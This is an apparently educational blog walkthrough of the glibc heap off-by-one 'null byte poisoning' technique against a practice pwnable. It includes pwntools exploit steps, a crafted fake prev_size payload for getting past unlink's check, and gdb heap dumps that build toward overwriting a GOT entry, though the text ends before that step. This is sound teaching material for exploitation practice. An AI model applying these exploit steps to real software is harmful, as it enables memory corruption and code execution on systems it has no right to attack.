Null Byte Poisoning - The Magic Byte

Hello folks! I hope you’re all doing great! Today’s topic is by far my favorite heap exploitation technique I’ve dealt with so far (as far as Linux is concerned). I can’t stress enough how much I love this technique. It’s super smart and technical, and even though malloc has been hardened a ton over the years, it still finds a way past the relevant mitigations. And the best part: a single-byte overflow is enough to cause chaos.

For today’s demo purposes, I’ve created a pwnable in order to practice/showcase the technique (I’ll demo the exploit on Ubuntu 16.04). I highly recommend doing some Google research and going through my previous posts on heap exploitation if you’ve never pwned the heap before. At the end of the post you can find another pwnable of the same nature, made by HITCON, in case you want to master the technique. Without further ado, let’s get right into it!


Disclaimer: The following text is part of my own research/comprehension. If you’re a veteran on this topic and you happen to spot any mistake, please let me know and I’ll correct it ASAP.


### Binary Recon

Before we jump into the theory of the null byte poison attack, let’s skim through the assembly real quick. The binary doesn’t do anything extraordinary.

  • We can allocate a chunk. The chunk has the following structure:
struct chunk {
     size_t size;   /* length of the user's data */
     char*  data;   /* malloc'd buffer holding the data */
};
  • We can dump the chunk’s content.

  • We can free the chunk. No bugs there.

/* index */  
mov eax, dword [rbp-0x14]  
mov rax, qword [rax*8+array]  /* array lives at 0x6020c0 */
/* Free data's malloc'd pointer */  
mov rax, qword [rax+0x8]
mov rdi, rax
call free
mov eax, dword [rbp-0x14]
/* Free the chunk itself */
mov rax, qword [rax*8+0x6020c0]
mov rdi, rax
call free
mov eax, dword [rbp-0x14]
/* No UAF or double-free */ 
mov qword [rax*8+0x6020c0], 0x0
  • And finally, we can edit the chunk’s content; that’s where the magic happens.
mov eax, dword [rbp-0x14]
mov rax, qword [rax*8+0x6020c0]
/* Get size of data */
mov rdx, qword [rax]
mov eax, dword [rbp-0x14]
mov rax, qword [rax*8+0x6020c0]
/* Get the data pointer */
mov rax, qword [rax+0x8]
mov rsi, rdx
mov rdi, rax
call 0x400b12

0x400b12:

	/* Null terminate at offset data + size */
	mov qword [rbp-0x8], rdi
	mov qword [rbp-0x10], rsi
	mov rdx, qword [rbp-0x8]
	mov rax, qword [rbp-0x10]
	add rax, rdx
	mov byte [rax], 0x0
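
In C, the routine at 0x400b12 boils down to something like the following (my own reconstruction from the assembly above, so the function name is made up):

#include <stddef.h>

/* Hypothetical C equivalent of the routine at 0x400b12 */
void edit_terminate(char *data, size_t size)
{
    /* data was malloc'd with exactly `size` usable bytes,
     * so this write lands one byte past the end of the buffer. */
    data[size] = '\0';
}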


Although this function might not look buggy to the inexperienced eye, it’s actually pretty lethal. Consider the following example:

alloc(0x88,  'A'*0x88)
alloc(0x108, 'B'*0x108)
0x603000:	0x0000000000000000	0x0000000000000021 <-- chunk 0
0x603010:	0x0000000000000088	0x0000000000603030 <-- data pointer
0x603020:	0x0000000000000000	0x0000000000000091
0x603030:	0x4141414141414141	0x4141414141414141
					...					...
0x6030a0:	0x4141414141414141	0x4141414141414141
0x6030b0:	0x4141414141414141	0x0000000000000021 <-- chunk 1
0x6030c0:	0x0000000000000108	0x00000000006030e0 <-- data pointer
0x6030d0:	0x0000000000000000	0x0000000000000111
0x6030e0:	0x4242424242424242	0x4242424242424242
0x6030f0:	0x4242424242424242	0x4242424242424242
					...					...

If we call edit on chunk 0, it will take the data’s address (0x603030) and null-terminate its content at offset:

0x603030 + 0x88 = 0x6030b8, i.e. chunk 1's size field.
edit(0, 'A'*2)
0x603000:	0x0000000000000000	0x0000000000000021 <-- chunk 0
0x603010:	0x0000000000000088	0x0000000000603030 <-- data pointer
0x603020:	0x0000000000000000	0x0000000000000091
0x603030:	0x4141414141414141	0x4141414141414141
					...					...
0x6030a0:	0x4141414141414141	0x4141414141414141
0x6030b0:	0x4141414141414141	0x0000000000000000 <-- chunk 1
0x6030c0:	0x0000000000000108	0x00000000006030e0 <-- data pointer
0x6030d0:	0x0000000000000000	0x0000000000000111
0x6030e0:	0x4242424242424242	0x4242424242424242
0x6030f0:	0x4242424242424242	0x4242424242424242
					...					...

Booyah, corruption! Chunk 1’s size went from 0x21 to 0x00. The binary recon is over; let’s move on to the pwning part.
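
For reference, the alloc/edit/free/dump calls you’ll see from here on are thin pwntools wrappers around the binary’s menu. A hypothetical sketch — the option numbers and prompt strings are assumptions, adapt them to the actual binary:

from pwn import *

p = process('./null_byte')  # hypothetical binary name

def alloc(size, data):
    p.sendlineafter('> ', '1')
    p.sendlineafter('size: ', str(size))
    p.sendafter('data: ', data)

def dump(idx):
    p.sendlineafter('> ', '2')
    p.sendlineafter('index: ', str(idx))
    return p.recvline()

def free(idx):
    p.sendlineafter('> ', '3')
    p.sendlineafter('index: ', str(idx))

def edit(idx, data):
    p.sendlineafter('> ', '4')
    p.sendlineafter('index: ', str(idx))
    p.sendafter('data: ', data)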


### Leaking Libc

The heap now has the above structure. There are two ways to leak libc: the boring way and the 1337 way. I’ll illustrate both, because why not. Freeing chunk 0 has the following effect:

free(0)
0x603000:	0x0000000000000000	0x0000000000000021 <-- chunk 0
0x603010:	0x0000000000000000	0x0000000000603030
0x603020:	0x0000000000000000	0x0000000000000091
0x603030:	0x00007ffff7dd37b8	0x00007ffff7dd37b8

Because the data’s heap chunk is of size 0x90, it’s considered a small chunk. Meaning, it will be placed in a circular doubly-linked list. Actually, it’ll first be placed in the unsorted bin, since for speed purposes malloc gives a recently freed chunk one chance of re-allocation before placing it in the corresponding small bin list.

/*
    Place the chunk in unsorted chunk list. Chunks are
    not placed into regular bins until after they have
    been given one chance to be used in malloc.
 */

    bck = unsorted_chunks(av);
    fwd = bck->fd;
    if (__glibc_unlikely (fwd->bk != bck))
        malloc_printerr ("free(): corrupted unsorted chunks");
    p->fd = fwd;
    p->bk = bck;
    if (!in_smallbin_range(size))
    {
        p->fd_nextsize = NULL;
        p->bk_nextsize = NULL;
    }
    bck->fd = p;
    fwd->bk = p;

    set_head(p, size | PREV_INUSE);
    set_foot(p, size);

    check_free_chunk(av, p);

The BK and FD pointers you see in the data’s chunk are main arena pointers into libc. They have the same value because the freed chunk is the only chunk in the circular doubly-linked list, so both its BK and FD fields point to the same bin address. The main arena’s state is the following:

==================  Main Arena  ==================
(0x20)     fastbin[0]: 0x603000 --> 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
                  top: 0x6031e0 (size : 0x20e20) 
       last_remainder: 0x0 (size : 0x0) 
            unsortbin: 0x603020 (size : 0x90)

Having read malloc’s source code, we should expect our data to be stored in the unsorted bin chunk at 0x603020 once we request a new allocation. Why?


Our data is 0x8 bytes long, meaning it’s of fast-chunk size. However, because the first allocation stores the size of the data and the pointer to the data (0x20 bytes in total, metadata included), 0x603000 will be returned for that first allocation. Now we’re left with the unsorted bin chunk and no fastbin available to store our 8-byte-long data. When there’s no fastbin available, the request is served through the smallbin code, and when there’s no smallbin available either (there is none in our case), it’s served through the unsorted bin code (0x603020 in our case) or via the remainder. Let’s see it in action.

# Could've leaked libc but let's step it up
alloc(0x8, 'C'*0x8) 
0x603000:	0x0000000000000000	0x0000000000000021 <-- new chunk
0x603010:	0x0000000000000008	0x0000000000603030
0x603020:	0x0000000000000000	0x0000000000000021 <-- new data pointer
0x603030:	0x4343434343434343	0x00007ffff7dd3838
0x603040:	0x4141414141414141	0x0000000000000071 <-- remainder chunk after the split
0x603050:	0x00007ffff7dd37b8	0x00007ffff7dd37b8

We allocated just enough bytes to avoid overwriting the libc pointer. As you might have noticed, the BK field got updated to 0x00007ffff7dd3838. Why that happened is for you to figure out; I can’t spoon-feed you everything :wink:

Now, if we go ahead and dump the chunk’s content, we’ll get the libc address back (obviously the address differs between executions, but its offset from libc’s base always remains the same; check it out yourself) and we’ll be able to calculate libc’s base address. That’s boring. Let’s abuse the null byte overflow in order to leak and then execute arbitrary code.
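
For completeness, the boring leak would look roughly like this. A sketch only: it assumes dump prints the data with puts, so the eight C’s run straight into the libc pointer, and the offset is a placeholder you’d measure in gdb for your own libc:

# Boring-leak sketch (assumption: dump() prints with puts(), so the
# 8 'C' bytes are followed by 6 bytes of the unsorted-bin BK pointer).
leaked = dump(0)
leak = u64(leaked[8:14].ljust(8, b'\x00'))
LEAK_OFFSET = 0x3c6838   # placeholder: compute (leak - libc base) in gdb once
libc_base = leak - LEAK_OFFSET
log.info('libc base @ %#x' % libc_base)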


### The Whys & Hows

There are many flavors of null byte poisoning. In a heap context though, null byte poisoning, aka off-by-one overflow, aka null byte overflow, aka chunk shrinking, is usually the ability to overflow a chunk’s size field while the chunk is free, leading to all kinds of pleasant mysteries.

The hows and whys of those mysteries will be presented by showing you the core pieces of malloc’s source code that the exploit/technique takes advantage of in order to achieve arbitrary code execution. Don’t worry if some of the code snippets make no sense in the beginning. When I introduce the technique I’ll explain everything, ranging from the macros all the way up to the pointer arithmetic involved.


The scenario I’ll aim for with this technique is to overlap a newly allocated chunk with an already in-use chunk (you’ll see what I mean) in order to overwrite the data pointer of the latter. There might be other ways to achieve arbitrary code execution by abusing this bug, but the core effects should be the same.

Let’s first allocate a couple more chunks in order to make the technique work. Since the heap is quite complicated, what I like to do before any malloc/free is “guess” where the chunks will be placed in memory, in order to test my understanding. So let’s make some assumptions together.

# p64(0x200) is needed afterwards in order to bypass one of unlink's checks
alloc(0x208, 'D'*0x1f0 + p64(0x200)) 

Ignore the content of the data for now; I’ll explain all about it later on. The state of the main arena is this:

==================  Main Arena  ==================
(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
                  top: 0x6031e0 (size : 0x20e20) 
       last_remainder: 0x603040 (size : 0x70) 
            unsortbin: 0x603040 (size : 0x70)

The remainder chunk is of size 0x70. What does that mean for our allocation? As explained before, every allocation needs 0x20 bytes in total (heap metadata included) to store the size of the data and the data pointer. 0x20 is obviously less than 0x70, so the remainder chunk will get split, then reattached, and its size should end up being 0x50.

size = chunksize (victim);

/*
   If a small request, try to use last remainder if it is the
   only chunk in unsorted bin.  This helps promote locality for
   runs of consecutive small requests. This is the only
   exception to best-fit, and applies only when there is
   no exact fit for a small chunk.
 */

if (in_smallbin_range (nb) &&
    bck == unsorted_chunks (av) &&
    victim == av->last_remainder &&
    (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
{
   				...
 	/* split and reattach remainder */
   	remainder_size = size - nb;
   	remainder = chunk_at_offset (victim, nb);
   	unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
    av->last_remainder = remainder;

        		...
    set_head (victim, nb | PREV_INUSE |
                        (av != &main_arena ? NON_MAIN_ARENA : 0));
    set_head (remainder, remainder_size | PREV_INUSE);
    set_foot (remainder, remainder_size);

    check_malloced_chunk (av, victim, nb);
    void *p = chunk2mem (victim);
    alloc_perturb (p, bytes);
    return p;
 }        
   	             

As for our data, there’s no free chunk available to serve it, so malloc will fall back to its last resort: the top chunk.

victim = av->top;
size = chunksize (victim);

if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
{
    remainder_size = size - nb;
    remainder = chunk_at_offset (victim, nb);
    av->top = remainder;
    set_head (victim, nb | PREV_INUSE |
               (av != &main_arena ? NON_MAIN_ARENA : 0));
    set_head (remainder, remainder_size | PREV_INUSE);

    check_malloced_chunk (av, victim, nb);
    void *p = chunk2mem (victim);
    alloc_perturb (p, bytes);
    return p;
}

Let’s check the effect of our allocation on main arena.

==================  Main Arena  ==================
(0x20)     fastbin[0]: 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
                  top: 0x6033f0 (size : 0x20c10) 
       last_remainder: 0x603060 (size : 0x50) 
            unsortbin: 0x0
(0x050)  smallbin[ 3]: 0x603060

Look at that! The unsorted chunk got placed in its corresponding small bin list, the last remainder moved further along and its size indeed became 0x50, and the top chunk also moved further along, its size reduced by 0x210 bytes as expected. Here’s the gdb view:

0x603000:	0x0000000000000000	0x0000000000000021
0x603010:	0x0000000000000008	0x0000000000603030
0x603020:	0x0000000000000000	0x0000000000000021
0x603030:	0x4343434343434343	0x00007ffff7dd3838
0x603040:	0x4141414141414141	0x0000000000000021 <-- new allocated chunk
0x603050:	0x0000000000000208	0x00000000006031f0 <-- new allocated pointer
0x603060:	0x4141414141414141	0x0000000000000051 <-- reattached remainder chunk
0x603070:	0x00007ffff7dd37f8	0x00007ffff7dd37f8
0x603080:	0x4141414141414141	0x4141414141414141
0x603090:	0x4141414141414141	0x4141414141414141
0x6030a0:	0x4141414141414141	0x4141414141414141
0x6030b0:	0x0000000000000050	0x0000000000000020
0x6030c0:	0x0000000000000108	0x00000000006030e0
0x6030d0:	0x0000000000000000	0x0000000000000111
0x6030e0:	0x4242424242424242	0x4242424242424242
0x6030f0:	0x4242424242424242	0x4242424242424242
0x603100:	0x4242424242424242	0x4242424242424242
0x603110:	0x4242424242424242	0x4242424242424242
0x603120:	0x4242424242424242	0x4242424242424242
					...					...
0x6031d0:	0x4242424242424242	0x4242424242424242
0x6031e0:	0x4242424242424242	0x0000000000000211 <-- new allocated data chunk
0x6031f0:	0x4444444444444444	0x4444444444444444
					...					...
0x6033c0:	0x4444444444444444	0x4444444444444444
0x6033d0:	0x4444444444444444	0x4444444444444444
0x6033e0:	0x0000000000000200	0x000000000000000a
0x6033f0:	0x0000000000000000	0x0000000000020c11 <-- new top chunk
					...					...

Let’s follow up with the next two allocations, which will make malloc take the same code path as last time.

alloc(0x108, 'E'*0x108) 
# Prevent top chunk consolidation
alloc(0x108, 'F'*0x108)
0x603000:	0x0000000000000000	0x0000000000000021
0x603010:	0x0000000000000008	0x0000000000603030
0x603020:	0x0000000000000000	0x0000000000000021
0x603030:	0x4343434343434343	0x00007ffff7dd3838
0x603040:	0x4141414141414141	0x0000000000000021
0x603050:	0x0000000000000208	0x00000000006031f0
0x603060:	0x4141414141414141	0x0000000000000021
0x603070:	0x0000000000000108	0x0000000000603400
0x603080:	0x4141414141414141	0x0000000000000031
0x603090:	0x0000000000000108	0x0000000000603510
0x6030a0:	0x4141414141414141	0x4141414141414141
0x6030b0:	0x0000000000000030	0x0000000000000021
0x6030c0:	0x0000000000000108	0x00000000006030e0
0x6030d0:	0x0000000000000000	0x0000000000000111
0x6030e0:	0x4242424242424242	0x4242424242424242
0x6030f0:	0x4242424242424242	0x4242424242424242
0x603100:	0x4242424242424242	0x4242424242424242
					...					...
0x6031c0:	0x4242424242424242	0x4242424242424242
0x6031d0:	0x4242424242424242	0x4242424242424242
0x6031e0:	0x4242424242424242	0x0000000000000211 <-- chunk x
0x6031f0:	0x4444444444444444	0x4444444444444444
0x603200:	0x4444444444444444	0x4444444444444444
0x603210:	0x4444444444444444	0x4444444444444444
					...					...
0x6033a0:	0x4444444444444444	0x4444444444444444
0x6033b0:	0x4444444444444444	0x4444444444444444
0x6033c0:	0x4444444444444444	0x4444444444444444
0x6033d0:	0x4444444444444444	0x4444444444444444
0x6033e0:	0x0000000000000200	0x000000000000000a
0x6033f0:	0x0000000000000000	0x0000000000000111 <-- chunk y
0x603400:	0x4545454545454545	0x4545454545454545
0x603410:	0x4545454545454545	0x4545454545454545
0x603420:	0x4545454545454545	0x4545454545454545
					...					...
0x6034d0:	0x4545454545454545	0x4545454545454545
0x6034e0:	0x4545454545454545	0x4545454545454545
0x6034f0:	0x4545454545454545	0x4545454545454545
0x603500:	0x4545454545454545	0x0000000000000111
0x603510:	0x4646464646464646	0x4646464646464646
0x603520:	0x4646464646464646	0x4646464646464646
0x603530:	0x4646464646464646	0x4646464646464646
					...					...
0x6035f0:	0x4646464646464646	0x4646464646464646
0x603600:	0x4646464646464646	0x4646464646464646
0x603610:	0x4646464646464646	0x00000000000209f1 <-- updated top chunk

Our setup is ready, time to step up our game.


### Previous Size Field

In case you didn’t know, when a chunk larger than the maximum fast-chunk size is freed, the chunk bordering it (technically the one after it in memory) needs to record the fact that the chunk before it got freed. It does that by clearing its PREV_INUSE bit and setting its prev_size field to the size of the freed chunk. Let me show you what I mean.

free(2) # chunk x
0x6031e0:	0x4242424242424242	0x0000000000000211 <-- chunk x [free]
0x6031f0:	0x00007ffff7dd37b8	0x00007ffff7dd37b8
0x603200:	0x4444444444444444	0x4444444444444444
0x603210:	0x4444444444444444	0x4444444444444444
					...					...
0x6033c0:	0x4444444444444444	0x4444444444444444
0x6033d0:	0x4444444444444444	0x4444444444444444
0x6033e0:	0x0000000000000200	0x000000000000000a
0x6033f0:	0x0000000000000210	0x0000000000000110 <-- chunk y 
0x603400:	0x4545454545454545	0x4545454545454545

As you can see, chunk y’s size field went from 0x111 to 0x110 to indicate that the previous chunk is free. Moreover, its prev_size field got updated from 0x00 to 0x210. The prev_size field is only meaningful while the previous chunk is free; otherwise it’s part of chunk x’s data. Do the math: 0x6033f0 (the address of chunk y) - 0x210 = 0x6031e0.
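
For reference, these are the corresponding macros in malloc.c:

#define PREV_INUSE 0x1

/* extract inuse bit of previous chunk */
#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)

/* Size of the chunk below P.  Only valid if !prev_inuse (P).  */
#define prev_size(p)        ((p)->mchunk_prev_size)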

Before I overwrite chunk x’s size with a null byte (making it 0x200), I believe it’d be nice to have both POVs in mind: the one with the intact size field and the one with the shrunk size. First, I’ll allocate a new chunk while leaving chunk x’s size untouched.

alloc(0x108,  'G'*0x108)

Malloc will take the following code path:

size = chunksize (victim);

/* We know the first chunk in this bin is big enough to use. */
assert ((unsigned long) (size) >= (unsigned long) (nb));

remainder_size = size - nb;

/* unlink */
unlink (av, victim, bck, fwd);

		...

remainder = chunk_at_offset (victim, nb);

/* We cannot assume the unsorted list is empty and therefore
   have to perform a complete insert here. */
   
bck = unsorted_chunks (av);
fwd = bck->fd;
if (__glibc_unlikely (fwd->bk != bck))
	malloc_printerr ("malloc(): corrupted unsorted chunks 2");
remainder->bk = bck;
remainder->fd = fwd;
bck->fd = remainder;
fwd->bk = remainder;

/* advertise as last remainder */
if (in_smallbin_range (nb))
    av->last_remainder = remainder;
        
    	...

set_head (victim, nb | PREV_INUSE |
              (av != &main_arena ? NON_MAIN_ARENA : 0));
set_head (remainder, remainder_size | PREV_INUSE);
set_foot (remainder, remainder_size);

check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p; 

It may look daunting at first, but thankfully malloc’s authors knew how to write readable code, and once you stare at it for a while it clicks. To sum up, here’s what will happen:

  • Calculate the remainder size after the split by subtracting the requested size from the current size (0x210 - 0x110 in our case).

  • Calculate the address of the remainder chunk after the split by adding the (aligned) requested size to the base address of the chunk that is about to be allocated (0x6031e0 + 0x110 in our case).

  • Unlink the unsorted chunk from the bin list in order to split it.

  • Declare it as the remainder chunk (av->last_remainder = remainder).

  • Update the remainder’s size field with the set_head macro.

/* Set size/use field */
#define set_head(p, s)  ((p)->mchunk_size = (s))
  • Update the prevsize field of chunk y.
/* Set size at footer (only when chunk is not in use) */
#define set_foot(p, s)	(((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
  • Give back the split chunk to the user.

This is how it looks in memory:

0x6031e0:	0x4242424242424242	0x0000000000000111 <-- new allocated chunk z
0x6031f0:	0x4747474747474747	0x4747474747474747
0x603200:	0x4747474747474747	0x4747474747474747
					...					...
0x6032d0:	0x4747474747474747	0x4747474747474747
0x6032e0:	0x4747474747474747	0x4747474747474747
0x6032f0:	0x4747474747474747	0x0000000000000101 <-- remainder chunk after split [free]
0x603300:	0x00007ffff7dd37b8	0x00007ffff7dd37b8
0x603310:	0x4444444444444444	0x4444444444444444
0x603320:	0x4444444444444444	0x4444444444444444
					...					...
0x6033c0:	0x4444444444444444	0x4444444444444444
0x6033d0:	0x4444444444444444	0x4444444444444444
0x6033e0:	0x0000000000000200	0x000000000000000a
0x6033f0:	0x0000000000000100	0x0000000000000110 <-- chunk y 
0x603400:	0x4545454545454545	0x4545454545454545

Just to be sure, let’s check malloc’s calculations.


(i)   remainder_size = size - nb = 0x210 - 0x110        = 0x100
(ii)  remainder      = chunk_at_offset (victim, nb)     = 0x6031e0   + 0x110  = 0x6032f0
(iii) set_head (remainder, remainder_size | PREV_INUSE) = *(0x6032f0 + 0x8)   = 0x101
(iv)  set_foot (remainder, remainder_size);             = *(0x6032f0 + 0x100) = 0x100

Cute! Let’s have a look at what happens when the null byte poison takes place before the allocation.


### Null Byte Poisoning

We’ll take advantage of the fact that edit null-terminates the provided string, as we saw during the recon phase.

# Null byte poison
edit(1, 'B'*0x108)
0x6030d0:	0x0000000000000000	0x0000000000000111
0x6030e0:	0x4242424242424242	0x4242424242424242
0x6030f0:	0x4242424242424242	0x4242424242424242
					...					...
0x6031d0:	0x4242424242424242	0x4242424242424242
0x6031e0:	0x4242424242424242	0x0000000000000200 <-- chunk x [shrunk & free]
0x6031f0:	0x00007ffff7dd37b8	0x00007ffff7dd37b8

Before we re-check malloc’s calculations for the new, shrunk size, let me explain a bit about the line below, which was used earlier in the exploit:

# p64(0x200) is needed in order to bypass unlink's check
alloc(0x208, 'D'*0x1f0 + p64(0x200))

As I mentioned above, the next allocation will unlink the chunk at address 0x6031e0. unlink has the following checks that we need to get past:

/* Take a chunk off a bin list */
#define unlink(AV, P, BK, FD) {                                          \
    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0)) \
      malloc_printerr ("corrupted size vs. prev_size");                  \
    FD = P->fd;                                                          \
    BK = P->bk;                                                          \
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                \
      malloc_printerr ("corrupted double-linked list");                  \
    ...

In particular, we only need to bypass the first check; the second one passes as-is, since the chunk’s FD and BK point to the unsorted bin head, whose fd/bk in turn point right back at our chunk. Practically, the first check makes sure that:

chunksize(P) == *(0x6031e0 + size) == prev_size(next_chunk(P))

In other words, the prev_size field of the next chunk must hold the size of its previous free chunk, as we discussed before. Since we overwrote the size with 0x200, the address at offset 0x6031e0 + 0x200 still belongs to the data area of chunk x; 0x6033e0, to be precise.

Meaning, if we don’t take care of the value at that offset, unlink will detect the memory corruption and abort. That’s why my data payload has that particular structure: we’re technically crafting a fake chunk.
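
Concretely, here’s how the payload lines up the fake prev_size (the offsets come straight from the dumps above):

# chunk x sits at 0x6031e0 and its user data starts at 0x6031f0.
# With the poisoned size of 0x200, unlink will look for prev_size at
# 0x6031e0 + 0x200 = 0x6033e0, which is 0x1f0 bytes into our data.
payload = b'D' * 0x1f0 + p64(0x200)   # fake prev_size lands at 0x6033e0
alloc(0x208, payload)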

Let’s move on with the allocation.

alloc(0x108,  'G'*0x108)
0x6031e0:	0x4242424242424242	0x0000000000000111 <-- new allocated chunk z
0x6031f0:	0x4747474747474747	0x4747474747474747
0x603200:	0x4747474747474747	0x4747474747474747
					...					...
0x6032d0:	0x4747474747474747	0x4747474747474747
0x6032e0:	0x4747474747474747	0x4747474747474747
0x6032f0:	0x4747474747474747	0x00000000000000f1 <-- remainder chunk after split [free]
0x603300:	0x00007ffff7dd37b8	0x00007ffff7dd37b8
0x603310:	0x4444444444444444	0x4444444444444444
					...					...
0x6033d0:	0x4444444444444444	0x4444444444444444
0x6033e0:	0x00000000000000f0	0x000000000000000a
0x6033f0:	0x0000000000000210	0x0000000000000110 <-- chunk y [prev_size not updated]
0x603400:	0x4545454545454545	0x4545454545454545
0x603410:	0x4545454545454545	0x4545454545454545

What the hell just happened?! Chunk y’s prev_size didn’t get updated, and the remainder chunk’s size is 0x10 less than it was without the null poison. It’s no coincidence that the fake “prev_size” field is 0x10 bytes before chunk y’s legit prev_size address. Off to the malloc calculations!


(i)   remainder_size = size - nb = 0x200 - 0x110        = 0xf0
(ii)  remainder      = chunk_at_offset (victim, nb)     = 0x6031e0   + 0x110  = 0x6032f0
(iii) set_head (remainder, remainder_size | PREV_INUSE) = *(0x6032f0 + 0x8)   = 0xf1
(iv)  set_foot (remainder, remainder_size);             = *(0x6032f0 + 0xf0)  = 0xf0

Do you see what I see? The set_foot macro failed to update chunk y’s prev_size field (because 0x6032f0 + 0xf0 = 0x6033e0), which is a major advantage for us. Why’s that? Chunk y thinks the previous free chunk is still 0x210 bytes before it, not knowing that the free chunk has in fact been updated, split and moved to a different address.

How can we take advantage of this? Well, the main goal is to overwrite a data pointer, so that once edit is called on that pointer, instead of editing data on the heap we edit whatever address we placed there (as long as it’s writable, of course). The Global Offset Table is writable, so that’s the target of choice (atoi’s GOT entry, to be precise).

Let’s keep stepping through the exploit and witness the magic.

# Because there's no pointer in between chunk z and y
# we need to allocate one more chunk such that once we
# free chunk y, the next allocation will overlap with the
# previously allocated chunk.
alloc(0x80,  'H'*0x80)
0x6031e0:	0x4242424242424242	0x0000000000000111 <-- new allocated chunk z < - - - - - - - - - +					
0x6031f0:	0x4747474747474747	0x4747474747474747												 |
0x603200:	0x4747474747474747	0x4747474747474747												 |
					...					...														 |
0x6032f0:	0x4747474747474747	0x0000000000000021 <-- new allocated chunk w 					 |
0x603300:	0x0000000000000080	0x0000000000603320 <-- new allocated data pointer	     	     |
0x603310:	0x4444444444444444	0x0000000000000091												 |
0x603320:	0x4848484848484848	0x4848484848484848    											 |
0x603330:	0x4848484848484848	0x4848484848484848											     |
					...					...														 |
0x603390:	0x4848484848484848	0x4848484848484848												 | - 0x210 
0x6033a0:	0x4444444444444444	0x0000000000000041 <-- remainder chunk after next split			 |
0x6033b0:	0x00007ffff7dd37b8	0x00007ffff7dd37b8												 |
0x6033c0:	0x4444444444444444	0x4444444444444444												 |
0x6033d0:	0x4444444444444444	0x4444444444444444												 |
0x6033e0:	0x0000000000000040	0x000000000000000a												 |
0x6033f0:	0x0000000000000210	0x0000000000000110 <-- chunk y [thinks chunk z is free] - - - - -
0x603400:	0x4545454545454545	0x4545454545454545

Once again, what was “supposed” to be chunk y’s prev_size field at address 0x6033e0 got updated to 0x40 (0xf0 - (0x90 + 0x20) = 0x40). We have successfully placed a heap pointer between chunk z and chunk y. If you’ve been paying attention up until now, you might be able to figure out the next two crucial steps. First, let’s free chunk z.

free(2) # chunk z
0x6031e0:	0x4242424242424242	0x0000000000000111 <-- new allocated chunk z [free] < - - - - - -
0x6031f0:	0x00000000006033a0	0x00007ffff7dd37b8												 |
0x603200:	0x4747474747474747	0x4747474747474747												 |
					...					...														 |
0x6032f0:	0x0000000000000110	0x0000000000000020 <-- chunk w [size / prev_size updated]		 |
0x603300:	0x0000000000000080	0x0000000000603320 <-- pointer to overwrite					     |
0x603310:	0x4444444444444444	0x0000000000000091												 |
					...					...														 |
0x603390:	0x4848484848484848	0x4848484848484848												 | - 0x210 
0x6033a0:	0x4444444444444444	0x0000000000000041 <-- remainder chunk 		                     |
0x6033b0:	0x00007ffff7dd37b8	0x00007ffff7dd37b8												 |
0x6033c0:	0x4444444444444444	0x4444444444444444												 |
0x6033d0:	0x4444444444444444	0x4444444444444444												 |
0x6033e0:	0x0000000000000040	0x000000000000000a												 |
0x6033f0:	0x0000000000000210	0x0000000000000110 <-- chunk y  - - - - - - - - - - - - - - - - -                     
0x603400:	0x4545454545454545	0x4545454545454545

Now what will malloc do once I free chunk y?

/* consolidate backward */
if (!prev_inuse(p)) {
   prevsize = prev_size (p);
   size += prevsize;
   p = chunk_at_offset(p, -((long) prevsize));
   unlink(av, p, bck, fwd);
}

Simply put, malloc doesn’t like fragmentation (except in the case of fastbins); it likes keeping things clean and tidy. For that reason, when a small chunk is about to be freed, malloc checks whether the chunks before and after it are already free, and if they are, it consolidates them. Let’s see it happen in action.

# unlink chunk y and z
free(3)
0x6031e0:	0x4242424242424242	0x0000000000000321 <-- consolidated chunk  - - - +   
0x6031f0:	0x00000000006033a0	0x00007ffff7dd37b8								 |
0x603200:	0x4747474747474747	0x4747474747474747								 |
0x603210:	0x4747474747474747	0x4747474747474747								 |
0x603220:	0x4747474747474747	0x4747474747474747								 | + 0x110
							...													 |
0x6032e0:	0x4747474747474747	0x4747474747474747								 |
0x6032f0:	0x0000000000000110	0x0000000000000020 <-- chunk w still in use < - - 
0x603300:	0x0000000000000080	0x0000000000603320 <-- pointer in use
0x603310:	0x4444444444444444	0x0000000000000091
0x603320:	0x4848484848484848	0x4848484848484848
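
Sanity-checking the consolidation math against the code above:

prevsize = prev_size (p)               = 0x210   (chunk y's stale prev_size)
size     = 0x110 + 0x210               = 0x320
p        = chunk_at_offset (p, -0x210) = 0x6033f0 - 0x210 = 0x6031e0  (chunk z)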
	

Voila! Chunk z and chunk y are now one entity, and an allocation smaller than 0x321 but larger than 0x110 will be able to overwrite the pointer at address 0x603308. Let’s inspect the main arena’s state.

==================  Main Arena  ==================
(0x20)     fastbin[0]: 0x603060 --> 0x603040 --> 0x0
(0x30)     fastbin[1]: 0x0
(0x40)     fastbin[2]: 0x0
(0x50)     fastbin[3]: 0x0
(0x60)     fastbin[4]: 0x0
(0x70)     fastbin[5]: 0x0
(0x80)     fastbin[6]: 0x0
                  top: 0x603610 (size : 0x209f0) 
       last_remainder: 0x6033a0 (size : 0x40) 
            unsortbin: 0x6031e0 (size : 0x320) <--> 0x6033a0 (overlap chunk with 0x6031e0(freed) )

Looking good. Ask yourselves: which code path will malloc take for an allocation of size 0x140? Let’s make our assumptions:

  • Fastbin chunks are taken off their bin list from the head. Meaning, 0x603060 should be given back to us to store the size of the data and the pointer to it.

  • As for the data of size 0x140: because 0x6031e0 is of small-bin size, it was placed in the unsorted bin list in case the user requests a size less than or equal to its own. We should expect 0x6031e0 to be served back to us in order to store our data. I’ll let you do the malloc calculations for where the remainder chunk will end up.

# The new consolidated free chunk is placed in the unsorted bin.
